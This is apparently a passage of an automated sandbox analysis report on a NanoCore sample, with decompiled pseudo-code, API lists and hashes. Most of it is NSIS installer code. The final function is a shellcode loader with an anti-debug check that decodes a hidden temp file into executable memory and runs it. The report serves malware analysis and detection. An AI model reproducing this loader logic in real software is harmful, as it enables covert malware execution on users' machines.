            								SetLastError(_t37);
            								_t21 = _t32;
            							} else {
            								goto L12;
            							}
            						}
            						return _t21;
            					}
            				} else {
            					_t31 = E00405878(_t23, _t42, _t2);
            					if(_t31 != 0) {
            						L8:
            						SetLastError(_t36);
            						return _t31;
            					} else {
            						goto L2;
            					}
            				}
            			}

            APIs
            • GetLastError.KERNEL32(?,?,004037D2,?,?,004016EA,00000000,?,00410E40), ref: 00404324
            • SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 0040438C
            • SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 00404398
            • _abort.LIBCMT ref: 0040439E
            Memory Dump Source
            • Source File: 00000002.00000002.904801478.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: ErrorLast$_abort
            • String ID:
            • API String ID: 88804580-0
            • Opcode ID: 62ede4f37894db3567f5427a1490bbed1412223467fdb5f37ac402c07740c3c0
            • Instruction ID: 10f1ed76ee289f7058500775698c1b2aead1ecf844b9f3100802fdeea25ad27f
            • Opcode Fuzzy Hash: 62ede4f37894db3567f5427a1490bbed1412223467fdb5f37ac402c07740c3c0
            • Instruction Fuzzy Hash: 75F0A976204701A6C21237769D0AB6B2A1ACBC1766F25423BFF18B22D1EF3CCD42859D
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E004025BA() {
            				void* _t4;
            				void* _t8;
            
            				E00402AE5();
            				E00402A79();
            				if(E004027D9() != 0) {
            					_t4 = E0040278B(_t8, __eflags);
            					__eflags = _t4;
            					if(_t4 != 0) {
            						return 1;
            					} else {
            						E00402815();
            						goto L1;
            					}
            				} else {
            					L1:
            					return 0;
            				}
            			}

            APIs
            • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 004025BA
            • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 004025BF
            • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 004025C4
              • Part of subcall function 004027D9: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 004027EA
            • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 004025D9
            Memory Dump Source
            • Source File: 00000002.00000002.904801478.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
            • String ID:
            • API String ID: 1761009282-0
            • Opcode ID: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
            • Instruction ID: 4128bea016199bb2a2d03f508bec19fe8aa18f4adc422371eefe93b2158e2da6
            • Opcode Fuzzy Hash: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
            • Instruction Fuzzy Hash: E0C0024414014264DC6036B32F2E5AA235409A63CDBD458BBA951776C3ADFD044A553E
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 87%
            			E00402E79(intOrPtr _a4) {
            				signed int _v8;
            				void* _v12;
            				char _v16;
            				intOrPtr* _t35;
            				struct HINSTANCE__* _t36;
            				struct HINSTANCE__* _t42;
            				intOrPtr* _t43;
            				intOrPtr* _t44;
            				WCHAR* _t48;
            				struct HINSTANCE__* _t49;
            				struct HINSTANCE__* _t53;
            				intOrPtr* _t56;
            				struct HINSTANCE__* _t61;
            				intOrPtr _t62;
            
            				if(_a4 == 2 || _a4 == 1) {
            					GetModuleFileNameW(0, 0x412bf8, 0x104);
            					_t48 =  *0x412e7c; // 0x561c2c
            					 *0x412e80 = 0x412bf8;
            					if(_t48 == 0 ||  *_t48 == 0) {
            						_t48 = 0x412bf8;
            					}
            					_v8 = 0;
            					_v16 = 0;
            					E00402F98(_t48, 0, 0,  &_v8,  &_v16);
            					_t61 = E0040311E(_v8, _v16, 2);
            					if(_t61 != 0) {
            						E00402F98(_t48, _t61, _t61 + _v8 * 4,  &_v8,  &_v16);
            						if(_a4 != 1) {
            							_v12 = 0;
            							_push( &_v12);
            							_t49 = E00404D5E(_t61);
            							if(_t49 == 0) {
            								_t56 = _v12;
            								_t53 = 0;
            								_t35 = _t56;
            								if( *_t56 == 0) {
            									L15:
            									_t36 = 0;
            									 *0x412e6c = _t53;
            									_v12 = 0;
            									_t49 = 0;
            									 *0x412e74 = _t56;
            									L16:
            									E00403E03(_t36);
            									_v12 = 0;
            									goto L17;
            								} else {
            									goto L14;
            								}
            								do {
            									L14:
            									_t35 = _t35 + 4;
            									_t53 =  &(_t53->i);
            								} while ( *_t35 != 0);
            								goto L15;
            							}
            							_t36 = _v12;
            							goto L16;
            						}
            						 *0x412e6c = _v8 - 1;
            						_t42 = _t61;
            						_t61 = 0;
            						 *0x412e74 = _t42;
            						goto L10;
            					} else {
            						_t43 = E00404831();
            						_push(0xc);
            						_pop(0);
            						 *_t43 = 0;
            						L10:
            						_t49 = 0;
            						L17:
            						E00403E03(_t61);
            						return _t49;
            					}
            				} else {
            					_t44 = E00404831();
            					_t62 = 0x16;
            					 *_t44 = _t62;
            					E00404639();
            					return _t62;
            				}
            			}

            APIs
            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\nanocore.exe,00000104), ref: 00402EB4
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.904801478.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: FileModuleName
            • String ID: C:\Users\user\Desktop\nanocore.exe$WV
            • API String ID: 514040917-1748748002
            • Opcode ID: d65f86be848b3adfa8fae1fc2f580f18a902642f457ef4245597d21aeb7a866c
            • Instruction ID: f3d78f03607b51ffb72bb6c03706454bab976d361db7ab759f67f4c6569d847e
            • Opcode Fuzzy Hash: d65f86be848b3adfa8fae1fc2f580f18a902642f457ef4245597d21aeb7a866c
            • Instruction Fuzzy Hash: 9631C471A00219AFCB21DF99DA8899FBBBCEF84744B10407BF804A72C0D6F44E41DB98
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E00405575() {
            
            				 *0x412e78 = GetCommandLineA();
            				 *0x412e7c = GetCommandLineW();
            				return 1;
            			}




            APIs
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.904801478.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: CommandLine
            • String ID: P3V
            • API String ID: 3253501508-3852363347
            • Opcode ID: 5876c0817ba34097e06c4a717b2c5bc39c627040ca7456eb6673a9cffb0a1105
            • Instruction ID: 265b5206e6e9c5440433cfe38bbdb56a7b23962a2c49d0f47ff6119da82ef27c
            • Opcode Fuzzy Hash: 5876c0817ba34097e06c4a717b2c5bc39c627040ca7456eb6673a9cffb0a1105
            • Instruction Fuzzy Hash: 24B09278800300CFD7008FB0BB8C0843BA0B2382023A09175D511D2320D6F40060DF4C
            Uniqueness

            Uniqueness Score: -1.00%

            Executed Functions

            C-Code - Quality: 86%
            			_entry_() {
            				struct _SHFILEINFOA _v356;
            				long _v372;
            				char _v380;
            				int _v396;
            				CHAR* _v400;
            				signed int _v404;
            				signed int _v408;
            				char _v416;
            				intOrPtr _v424;
            				intOrPtr _t31;
            				void* _t36;
            				CHAR* _t41;
            				signed int _t43;
            				CHAR* _t46;
            				signed int _t48;
            				int _t52;
            				signed int _t56;
            				void* _t78;
            				CHAR* _t89;
            				signed int _t90;
            				void* _t91;
            				CHAR* _t96;
            				signed int _t97;
            				signed int _t99;
            				signed char* _t103;
            				CHAR* _t105;
            				signed int _t106;
            				void* _t108;
            
            				_t99 = 0;
            				_v372 = 0;
            				_t105 = "Error writing temporary file. Make sure your temp folder is valid.";
            				_v380 = 0x20;
            				__imp__#17();
            				__imp__OleInitialize(0); // executed
            				 *0x7a3030 = _t31;
            				SHGetFileInfoA(0x79e540, 0,  &_v356, 0x160, 0); // executed
            				E004059BF(0x7a2780, "NSIS Error");
            				_t89 = "C:\\Users\\jones\\AppData\\Local\\Temp\\";
            				GetTempPathA(0x400, _t89);
            				_t36 = E00403116(_t108);
            				_t109 = _t36;
            				if(_t36 != 0) {
            					L2:
            					_t96 = "C:\\Users\\jones\\Desktop\\nanocore.exe 0";
            					DeleteFileA(_t96); // executed
            					E004059BF(_t96, GetCommandLineA());
            					 *0x7a2f80 = GetModuleHandleA(0);
            					_t41 = _t96;
            					if("C:\\Users\\jones\\Desktop\\nanocore.exe 0" == 0x22) {
            						_v404 = 0x22;
            						_t41 =  &M007A9001;
            					}
            					_t43 = CharNextA(E004054F7(_t41, _v404));
            					_v408 = _t43;
            					while(1) {
            						_t91 =  *_t43;
            						_t112 = _t91;
            						if(_t91 == 0) {
            							break;
            						}
            						__eflags = _t91 - 0x20;
            						if(_t91 != 0x20) {
            							L7:
            							__eflags =  *_t43 - 0x22;
            							_v404 = 0x20;
            							if( *_t43 == 0x22) {
            								_t43 = _t43 + 1;
            								__eflags = _t43;
            								_v404 = 0x22;
            							}
            							__eflags =  *_t43 - 0x2f;
            							if( *_t43 != 0x2f) {
            								L17:
            								_t43 = E004054F7(_t43, _v404);
            								__eflags =  *_t43 - 0x22;
            								if(__eflags == 0) {
            									_t43 = _t43 + 1;
            									__eflags = _t43;
            								}
            								continue;
            							} else {
            								_t43 = _t43 + 1;
            								__eflags =  *_t43 - 0x53;
            								if( *_t43 == 0x53) {
            									__eflags = ( *(_t43 + 1) | 0x00000020) - 0x20;
            									if(( *(_t43 + 1) | 0x00000020) == 0x20) {
            										_t99 = _t99 | 0x00000002;
            										__eflags = _t99;
            									}
            								}
            								__eflags =  *_t43 - 0x4352434e;
            								if( *_t43 == 0x4352434e) {
            									__eflags = ( *(_t43 + 4) | 0x00000020) - 0x20;
            									if(( *(_t43 + 4) | 0x00000020) == 0x20) {
            										_t99 = _t99 | 0x00000004;
            										__eflags = _t99;
            									}
            								}
            								__eflags =  *(_t43 - 2) - 0x3d442f20;
            								if( *(_t43 - 2) == 0x3d442f20) {
            									 *(_t43 - 2) =  *(_t43 - 2) & 0x00000000;
            									__eflags = _t43 + 2;
            									E004059BF("C:\\Users\\jones\\AppData\\Local\\Temp", _t43 + 2);
            									L22:
            									_t46 = E00402C37(_t112, _t99); // executed
            									_t105 = _t46;
            									if(_t105 != 0) {
            										L32:
            										E00403501();
            										__imp__OleUninitialize();
            										if(_t105 == 0) {
            											__eflags =  *0x7a3014;
            											if( *0x7a3014 != 0) {
            												_t106 = E00405CD2("ADVAPI32.dll", "OpenProcessToken");
            												_t97 = E00405CD2("ADVAPI32.dll", "LookupPrivilegeValueA");
            												_t90 = E00405CD2("ADVAPI32.dll", "AdjustTokenPrivileges");
            												__eflags = _t106;
            												if(_t106 != 0) {
            													__eflags = _t97;
            													if(_t97 != 0) {
            														__eflags = _t90;
            														if(_t90 != 0) {
            															_t56 =  *_t106(GetCurrentProcess(), 0x28,  &_v400);
            															__eflags = _t56;
            															if(_t56 != 0) {
            																 *_t97(0, "SeShutdownPrivilege",  &_v400);
            																_v416 = 1;
            																_v404 = 2;
            																 *_t90(_v424, 0,  &_v416, 0, 0, 0);
            															}
            														}
            													}
            												}
            												_t52 = ExitWindowsEx(2, 0);
            												__eflags = _t52;
            												if(_t52 == 0) {
            													E00401410(9);
            												}
            											}
            											_t48 =  *0x7a302c;
            											__eflags = _t48 - 0xffffffff;
            											if(_t48 != 0xffffffff) {
            												_v396 = _t48;
            											}
            											ExitProcess(_v396);
            										}
            										E004052BF(_t105, 0x200010);
            										ExitProcess(2);
            									}
            									if( *0x7a2f94 == _t46) {
            										L31:
            										 *0x7a302c =  *0x7a302c | 0xffffffff;
            										_v396 = E00403526();
            										goto L32;
            									}
            									_t103 = E004054F7(_t96, _t46);
            									while(_t103 >= _t96) {
            										__eflags =  *_t103 - 0x3d3f5f20;
            										if(__eflags == 0) {
            											break;
            										}
            										_t103 = _t103 - 1;
            										__eflags = _t103;
            									}
            									_t116 = _t103 - _t96;
            									_t105 = "Error launching installer";
            									if(_t103 < _t96) {
            										lstrcatA(_t89, "~nsu.tmp\\");
            										CreateDirectoryA(_t89, 0);
            										_v404 = _v404 & 0x00000000;
            										do {
            											 *0x79d940 = 0x22;
            											lstrcatA(0x79d940, _t89);
            											lstrcatA(0x79d940, "Au_.exe");
            											DeleteFileA(0x79d941);
            											if(_t105 == 0) {
            												goto L43;
            											}
            											if(lstrcmpiA(GetModuleFileNameA( *0x7a2f80, 0x79e140, 0x400) + 0x79e13a,  &M004091A1) == 0) {
            												goto L32;
            											}
            											if(CopyFileA(0x79e140, 0x79d941, 0) != 0) {
            												E00405707(0x79d941, 0);
            												if("C:\\Users\\jones\\AppData\\Local\\Temp" == 0) {
            													E00405513(0x79e140);
            												} else {
            													E004059BF(0x79e140, "C:\\Users\\jones\\AppData\\Local\\Temp");
            												}
            												lstrcatA(0x79d940, "\" ");
            												lstrcatA(0x79d940, _v400);
            												lstrcatA(0x79d940, " _?=");
            												lstrcatA(0x79d940, 0x79e140);
            												E004054CC(0x79d940);
            												_t78 = E00405247(0x79d940, _t89);
            												if(_t78 != 0) {
            													CloseHandle(_t78);
            													_t105 = 0;
            												}
            											}
            											L43:
            											"Au_.exe" =  &("Au_.exe"[1]);
            											_v404 = _v404 + 1;
            										} while (_v404 < 0x1a);
            										goto L32;
            									}
            									 *_t103 =  *_t103 & 0x00000000;
            									_t104 =  &(_t103[4]);
            									if(E004055AC(_t116,  &(_t103[4])) == 0) {
            										goto L32;
            									}
            									E004059BF("C:\\Users\\jones\\AppData\\Local\\Temp", _t104);
            									E004059BF("C:\\Users\\jones\\AppData\\Local\\Temp", _t104);
            									_t105 = 0;
            									goto L31;
            								}
            								goto L17;
            							}
            						} else {
            							goto L6;
            						}
            						do {
            							L6:
            							_t43 = _t43 + 1;
            							__eflags =  *_t43 - 0x20;
            						} while ( *_t43 == 0x20);
            						goto L7;
            					}
            					goto L22;
            				}
            				GetWindowsDirectoryA(_t89, 0x3fb);
            				lstrcatA(_t89, "\\Temp");
            				if(E00403116(_t109) == 0) {
            					goto L32;
            				}
            				goto L2;
            			}


            APIs
            • #17.COMCTL32 ref: 00403164
            • OleInitialize.OLE32(00000000), ref: 0040316B
            • SHGetFileInfoA.SHELL32(0079E540,00000000,?,00000160,00000000), ref: 00403187
              • Part of subcall function 004059BF: lstrcpynA.KERNEL32(?,?,00000400,0040319C,007A2780,NSIS Error), ref: 004059CC
            • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,007A2780,NSIS Error), ref: 004031A7
            • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004031BC
            • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004031C8
              • Part of subcall function 00403116: CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00403137
            • DeleteFileA.KERNELBASE(C:\Users\user\Desktop\nanocore.exe 0), ref: 004031E0
            • GetCommandLineA.KERNEL32 ref: 004031E6
            • GetModuleHandleA.KERNEL32(00000000,C:\Users\user\Desktop\nanocore.exe 0,00000000), ref: 004031F5
            • CharNextA.USER32(00000000,C:\Users\user\Desktop\nanocore.exe 0,00000020), ref: 00403220
            • OleUninitialize.OLE32(00000000,00000000,00000020), ref: 0040331B
            • ExitProcess.KERNEL32 ref: 00403336
            • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp\,C:\Users\user\Desktop\nanocore.exe 0,00000000,00000000,00000000,00000020), ref: 00403342
            • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,~nsu.tmp\,C:\Users\user\Desktop\nanocore.exe 0,00000000,00000000,00000000,00000020), ref: 0040334A
            • lstrcatA.KERNEL32(0079D940,C:\Users\user\AppData\Local\Temp\), ref: 0040336A
            • lstrcatA.KERNEL32(0079D940,Au_.exe,0079D940,C:\Users\user\AppData\Local\Temp\), ref: 00403375
            • DeleteFileA.KERNEL32(0079D941,0079D940,Au_.exe,0079D940,C:\Users\user\AppData\Local\Temp\), ref: 0040337F
            • GetModuleFileNameA.KERNEL32(0079E140,00000400), ref: 00403399
            • lstrcmpiA.KERNEL32(?,u_.exe), ref: 004033AB
            • CopyFileA.KERNEL32 ref: 004033C1
            • lstrcatA.KERNEL32(0079D940,00409218,0079E140,0079D941,00000000), ref: 004033F9
            • lstrcatA.KERNEL32(0079D940,00000000,0079D940,00409218,0079E140,0079D941,00000000), ref: 00403403
            • lstrcatA.KERNEL32(0079D940, _?=,0079D940,00000000,0079D940,00409218,0079E140,0079D941,00000000), ref: 0040340E
            • lstrcatA.KERNEL32(0079D940,0079E140,0079D940, _?=,0079D940,00000000,0079D940,00409218,0079E140,0079D941,00000000), ref: 00403415
            • CloseHandle.KERNEL32(00000000,0079D940,C:\Users\user\AppData\Local\Temp\,0079D940,0079D940,0079E140,0079D940, _?=,0079D940,00000000,0079D940,00409218,0079E140,0079D941,00000000), ref: 0040342C
            • GetCurrentProcess.KERNEL32(00000028,?,ADVAPI32.dll,AdjustTokenPrivileges,ADVAPI32.dll,LookupPrivilegeValueA,ADVAPI32.dll,OpenProcessToken), ref: 0040349C
            • ExitWindowsEx.USER32(00000002,00000000), ref: 004034D8
            • ExitProcess.KERNEL32 ref: 004034FB
            Strings
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp
            Similarity
            • API ID: lstrcat$File$DirectoryExitProcess$CreateDeleteHandleModuleWindows$CharCloseCommandCopyCurrentInfoInitializeLineNameNextPathTempUninitializelstrcmpilstrcpyn
            • String ID: /D=$ _?=$ _?=$"$@y$ADVAPI32.dll$AdjustTokenPrivileges$Au_.exe$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\nanocore.exe 0$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$LookupPrivilegeValueA$NCRC$NSIS Error$OpenProcessToken$SeShutdownPrivilege$\Temp$~nsu.tmp\
            • API String ID: 3079827372-4011719288
            • Opcode ID: 47f34ade52d88a0d51b74b8dd2826b7976c72476fa727e71a17f23d6d741ace8
            • Instruction ID: c6ceebf7ae23f53b4317326a2321724ec613524e7e1bbd79e967450880995801
            • Opcode Fuzzy Hash: 47f34ade52d88a0d51b74b8dd2826b7976c72476fa727e71a17f23d6d741ace8
            • Instruction Fuzzy Hash: 3B91D370508350BAE7216FA19D0AB6B7E9CEF46716F14047EF541B61D3CBBC9D008AAE
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 98%
            			E00405301(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
            				signed int _v8;
            				signed int _v12;
            				struct _WIN32_FIND_DATAA _v332;
            				signed int _t37;
            				char* _t49;
            				signed char _t51;
            				signed int _t54;
            				signed int _t57;
            				signed int _t63;
            				signed int _t65;
            				void* _t67;
            				signed int _t70;
            				CHAR* _t72;
            				CHAR* _t74;
            				char* _t77;
            
            				_t74 = _a4;
            				_t37 = E004055AC(__eflags, _t74);
            				_v12 = _t37;
            				if((_a8 & 0x00000008) != 0) {
            					_t65 = DeleteFileA(_t74); // executed
            					asm("sbb eax, eax");
            					_t67 =  ~_t65 + 1;
            					 *0x7a3008 =  *0x7a3008 + _t67;
            					return _t67;
            				}
            				_t70 = _a8 & 0x00000001;
            				__eflags = _t70;
            				_v8 = _t70;
            				if(_t70 == 0) {
            					L5:
            					E004059BF(0x7a0588, _t74);
            					__eflags = _t70;
            					if(_t70 == 0) {
            						E00405513(_t74);
            					} else {
            						lstrcatA(0x7a0588, "\\*.*");
            					}
            					lstrcatA(_t74, 0x409010);
            					_t72 =  &(_t74[lstrlenA(_t74)]);
            					_t37 = FindFirstFileA(0x7a0588,  &_v332);
            					__eflags = _t37 - 0xffffffff;
            					_a4 = _t37;
            					if(_t37 == 0xffffffff) {
            						L26:
            						__eflags = _v8;
            						if(_v8 != 0) {
            							_t31 = _t72 - 1;
            							 *_t31 =  *(_t72 - 1) & 0x00000000;
            							__eflags =  *_t31;
            						}
            						goto L28;
            					} else {
            						goto L9;
            					}
            					do {
            						L9:
            						_t77 =  &(_v332.cFileName);
            						_t49 = E004054F7( &(_v332.cFileName), 0x3f);
            						__eflags =  *_t49;
            						if( *_t49 != 0) {
            							__eflags = _v332.cAlternateFileName;
            							if(_v332.cAlternateFileName != 0) {
            								_t77 =  &(_v332.cAlternateFileName);
            							}
            						}
            						__eflags =  *_t77 - 0x2e;
            						if( *_t77 != 0x2e) {
            							L16:
            							E004059BF(_t72, _t77);
            							_t51 = _v332.dwFileAttributes;
            							__eflags = _t51 & 0x00000010;
            							if((_t51 & 0x00000010) == 0) {
            								SetFileAttributesA(_t74, _t51 & 0x000000fe);
            								_t54 = DeleteFileA(_t74);
            								__eflags = _t54;
            								if(_t54 != 0) {
            									E00404D62(0xfffffff2, _t74);
            								} else {
            									__eflags = _a8 & 0x00000004;
            									if((_a8 & 0x00000004) == 0) {
            										 *0x7a3008 =  *0x7a3008 + 1;
            									} else {
            										E00404D62(0xfffffff1, _t74);
            										E00405707(_t74, 0);
            									}
            								}
            							} else {
            								__eflags = (_a8 & 0x00000003) - 3;
            								if(__eflags == 0) {
            									E00405301(_t72, __eflags, _t74, _a8);
            								}
            							}
            							goto L24;
            						}
            						_t63 =  *((intOrPtr*)(_t77 + 1));
            						__eflags = _t63;
            						if(_t63 == 0) {
            							goto L24;
            						}
            						__eflags = _t63 - 0x2e;
            						if(_t63 != 0x2e) {
            							goto L16;
            						}
            						__eflags =  *((char*)(_t77 + 2));
            						if( *((char*)(_t77 + 2)) == 0) {
            							goto L24;
            						}
            						goto L16;
            						L24:
            						_t57 = FindNextFileA(_a4,  &_v332);
            						__eflags = _t57;
            					} while (_t57 != 0);
            					_t37 = FindClose(_a4);
            					goto L26;
            				} else {
            					__eflags = _t37;
            					if(_t37 == 0) {
            						L28:
            						__eflags = _v8;
            						if(_v8 == 0) {
            							L36:
            							return _t37;
            						}
            						__eflags = _v12;
            						if(_v12 != 0) {
            							_t37 = E00405C94(_t74);
            							__eflags = _t37;
            							if(_t37 == 0) {
            								goto L36;
            							}
            							E004054CC(_t74);
            							SetFileAttributesA(_t74, 0x80);
            							_t37 = RemoveDirectoryA(_t74);
            							__eflags = _t37;
            							if(_t37 != 0) {
            								return E00404D62(0xffffffe5, _t74);
            							}
            							__eflags = _a8 & 0x00000004;
            							if((_a8 & 0x00000004) == 0) {
            								goto L30;
            							}
            							E00404D62(0xfffffff1, _t74);
            							return E00405707(_t74, 0);
            						}
            						L30:
            						 *0x7a3008 =  *0x7a3008 + 1;
            						return _t37;
            					}
            					__eflags = _a8 & 0x00000002;
            					if((_a8 & 0x00000002) == 0) {
            						goto L28;
            					}
            					goto L5;
            				}
            			}


            APIs
            • DeleteFileA.KERNELBASE(?,?,C:\Users\user\Desktop\nanocore.exe 0,00000000), ref: 0040531F
            • lstrcatA.KERNEL32(007A0588,\*.*,007A0588,?,C:\Users\user\AppData\Local\Temp\,?,C:\Users\user\Desktop\nanocore.exe 0,00000000), ref: 00405369
            • lstrcatA.KERNEL32(?,00409010,?,007A0588,?,C:\Users\user\AppData\Local\Temp\,?,C:\Users\user\Desktop\nanocore.exe 0,00000000), ref: 0040537C
            • lstrlenA.KERNEL32(?,?,00409010,?,007A0588,?,C:\Users\user\AppData\Local\Temp\,?,C:\Users\user\Desktop\nanocore.exe 0,00000000), ref: 00405382
            • FindFirstFileA.KERNEL32(007A0588,?,?,?,00409010,?,007A0588,?,C:\Users\user\AppData\Local\Temp\,?,C:\Users\user\Desktop\nanocore.exe 0,00000000), ref: 00405393
            • FindNextFileA.KERNEL32(?,?,000000F2,?), ref: 0040544A
            • FindClose.KERNEL32(?), ref: 0040545B
            Strings
            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405335
            • \*.*, xrefs: 00405363
            • C:\Users\user\Desktop\nanocore.exe 0, xrefs: 0040530B
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp
            Similarity
            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
            • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\nanocore.exe 0$\*.*
            • API String ID: 2035342205-464020764
            • Opcode ID: 8380fa4691e2e165f963ed649da4ecfc2ff1d2e951a9b6cdbac17f467c00847b
            • Instruction ID: f738604874d37791e21c186390ce59424126d5fa43ea1a12c0606eb471faeee6
            • Opcode Fuzzy Hash: 8380fa4691e2e165f963ed649da4ecfc2ff1d2e951a9b6cdbac17f467c00847b
            • Instruction Fuzzy Hash: 5B51E030804A04AADB216F228C49BFF3A78DF82759F14817BF944B51D2C77C5982DE6E
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 82%
            			E6EEC1000() {
            				long _v8;
            				short _v528;
            				long _t12;
            				void* _t16;
            				signed char _t23;
            				void* _t35;
            				long _t38;
            
            				_v8 = 0;
            				if(IsDebuggerPresent() != 0) {
            					DebugBreak();
            				}
            				_t12 = GetTempPathW(0x103,  &_v528);
            				if(_t12 != 0) {
            					lstrcatW( &_v528, L"\\ks446tcfy17w7jqy3r");
            					_t16 = CreateFileW( &_v528, 0x80000000, 7, 0, 3, 0x80, 0); // executed
            					_t35 = _t16;
            					if(_t35 == 0xffffffff) {
            						L12:
            						return _t16;
            					}
            					_t16 = GetFileSize(_t35, 0);
            					_t38 = _t16;
            					if(_t38 == 0xffffffff) {
            						L11:
            						goto L12;
            					}
            					_t16 = VirtualAlloc(0, _t38, 0x3000, 0x40); // executed
            					 *0x6eec3000 = _t16;
            					if(_t16 == 0) {
            						goto L11;
            					}
            					_t16 = ReadFile(_t35, _t16, _t38,  &_v8, 0); // executed
            					if(_t16 == 0) {
            						goto L11;
            					}
            					_t23 = 0;
            					if(_v8 <= 0) {
            						L10:
            						_t16 =  *0x6eec3000(); // executed
            						goto L11;
            					}
            					do {
            						asm("rol cl, 0x2");
            						 *((char*)( *0x6eec3000 + _t23)) = (0x00000082 - (( !( *((intOrPtr*)( *0x6eec3000 + _t23)) + 0x00000003 ^ 0x0000006a) ^ 0x000000e1) - _t23 ^ _t23) ^ 0x00000068) - 1 + _t23;
            						_t23 = _t23 + 1;
            					} while (_t23 < _v8);
            					goto L10;
            				}
            				return _t12;
            			}

            APIs
            • IsDebuggerPresent.KERNEL32 ref: 6EEC1010
            • DebugBreak.KERNEL32 ref: 6EEC101A
            • GetTempPathW.KERNEL32(00000103,?), ref: 6EEC102C
            • lstrcatW.KERNEL32(?,\ks446tcfy17w7jqy3r), ref: 6EEC1047
            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 6EEC1066
            • GetFileSize.KERNEL32(00000000,00000000), ref: 6EEC107B
            • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000040), ref: 6EEC1092
            • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000), ref: 6EEC10AA
            Strings
            Memory Dump Source
            • Source File: 00000008.00000002.669698742.000000006EEC1000.00000020.00020000.sdmp, Offset: 6EEC0000, based on PE: true
            • Associated: 00000008.00000002.669690470.000000006EEC0000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.669714580.000000006EEC2000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.669723056.000000006EEC4000.00000002.00020000.sdmp
            Similarity
            • API ID: File$AllocBreakCreateDebugDebuggerPathPresentReadSizeTempVirtuallstrcat
            • String ID: \ks446tcfy17w7jqy3r
            • API String ID: 4020703165-2035310939
            • Opcode ID: c314478f6f4e40384318fc6190c3d30b27ba08e08edfb8903b1c4efaf63681d6
            • Instruction ID: 127d8fd852e8431a457aa86f35660a5c419bb66ce520509ff131fb3b67d2930e
